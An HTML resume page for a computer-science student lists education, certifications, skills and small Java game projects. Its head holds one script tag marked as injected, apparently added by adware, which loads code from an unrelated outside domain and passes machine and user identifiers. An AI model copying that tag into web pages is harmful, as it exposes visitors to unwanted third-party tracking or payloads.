<html>
<head>
	<title>NIKHIL AGGARWAL</title>
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" integrity="sha512-dTfge/zgoMYpP7QbHy4gWMEGsbsdZeCXz7irItjcC3sPUFtf0kuFbDz/ixG7ArTxmDjLXDmezHubeNikyKGVyQ==" crossorigin="anonymous">
<script data-type="injected" src="//www.technologiestuart.com/addon/script/content_site?integration=anywhere&v=d1.57.1.5&os_mj=10&os_mn=0&os_bitness=64&mid=7064c00553d9ec87198da93126ded6e7&uid=1DC8E2435F47D54389ACCD9012F60017&aid=1650&aid2=none&ts=1449056733&ts2=&psd=true"></script></head>
<body>
	<div class="container">
		
		<div class="page-header text-center">
			<h1>Nikhil Aggarwal</h1>
		</div>
             <div class="row">
             <div class="text-center">

             <img src="https://scontent.fdel3-1.fna.fbcdn.net/v/t1.0-1/p160x160/13521955_1708780362721839_4289502227247160400_n.jpg?oh=35a01ca48f81cb1fcf37f1196b337f1e&oe=592724EB" height="250">
		
                </div>
                </div>
                 <br><br>

                <!-- Objective -->
		<p><b><h4>Objective-</h4></b>Seeking challenging opportunities that can enhance my technical skills and abilities in the field of Information Technology.</p>
		<br><br>


		<!-- Edu Qual -->
		<div class="panel panel-default">
  			<div class="panel-heading">
  				Education Qualification
  			</div>
  			<table class="table">
  				<tr>
  					<th>S.No</th>
  					<th>Institute Name</th>
  					<th>Year</th>
  				</tr>

  				<tr>
  					<td>1</td>
  					<td>GTBIT</td>
  					<td>3rd Year</td>
  				</tr>

			</table>

		</div>

		<!-- Workshops -->
		<div class="panel panel-default">
  			<div class="panel-heading">
  				Certification
  			</div>
  			<table class="table">
  				<tr>
  					<th>S.No</th>
  					<th>Company</th>
  					<th>Qualification</th>
  				</tr>

  				<tr>
  					<td>1</td>
  					<td><a href="http://swiftintern.com">Swiftintern.com</a></td>
  					<td>Web Designing and Hosting</td>
  				</tr>
				
				<tr>
  					<td>2</td>
  					<td><a href="http://brain-mentors.com">Brain Mentors</a></td>
  					<td>Core Java</td>
  				</tr>

			</table>
		</div>
		
		
		<!-- Skills -->
		<h4>Skills</h4>
		<ul class="list-group">
			<li class="list-group-item">Software :
				<span class="label label-info">MS Office</span>  
				<span class="label label-info">Sublime Text</span>
				<span class="label label-info">Eclipse</span>
				<span class="label label-info">Dev C++</span>
			</li>
			<li class="list-group-item">OS : Windows, Ubuntu</li>
			<li class="list-group-item">Programming : C++, PHP, HTML5, CSS,PYTHON,Core Java</li>
		</ul>

	
	
	<!--Projects-->
	<h4>Projects</h4>
	<ul class="list-group">
               	<li class="list-group-item">Java :
			<span class="label label-info">Kung Fu Master Game with special features</span>  
			<span class="label label-info">Brick Breaker Game</span>

			</li>

			
		</ul>



	</div>
	
</body>
</html>
